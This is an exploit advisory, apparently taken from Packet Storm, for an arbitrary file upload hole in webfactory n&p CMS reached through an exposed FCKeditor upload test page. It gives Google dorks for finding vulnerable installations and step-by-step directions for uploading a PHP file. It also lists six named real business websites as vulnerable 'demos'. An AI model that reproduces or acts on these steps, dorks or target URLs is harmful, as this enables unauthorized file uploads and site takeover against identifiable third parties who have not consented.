Webfactory N&P CMS suffers from an arbitrary file upload vulnerability. Note that this advisory has site-specific information.
fc98fed6c5f6010a2337d399492011a87e1b1f46ed6a6e1a0a7dfebb279d616e[+] webfactory n&p CMS (fckeditor) Arbitrary File Upload Vulnerability
[+] Exploit Title : webfactory n&p CMS (FCKEDITOR)
[+] Exploit Author : Ashiyane Digital Security Team
[+] Vendor Homepage : http://www.n-p.at
[+] Google Dork 1 : inurl:pcms/content
[+] Google Dork 2 : by webfactory n&p
[+] Date: 2015/05/11
[+] Tested On : Windows 7 / Mozilla Firefox
[+] Version : All Version
[+] exploit => /admin/fckeditor/editor/filemanager/connectors/uploadtest.html
[+] first go to => http://site.com/[path]
[+] then =>
http://www.site.com/[path]/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
[+] select => Select the "File Uploader"> php ... upload to : Uploaded
File URL:
[+] demos :
[+]
http://tirol-kaiserwinkl.at/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
[+]
http://ruetz-sport.at/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
[+]
http://berauergmbh.at/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
[+]
http://creativceramic.at/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
[+]
http://hauskofler.at/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
[+]
http://romantica-geiger.at/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
[+][+][+][+][+][+][+][+][+][+][+]
[+]Discovered By : Cyb3r_Dr4in[+]
[+][+][+][+][+][+][+][+][+][+][+]
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed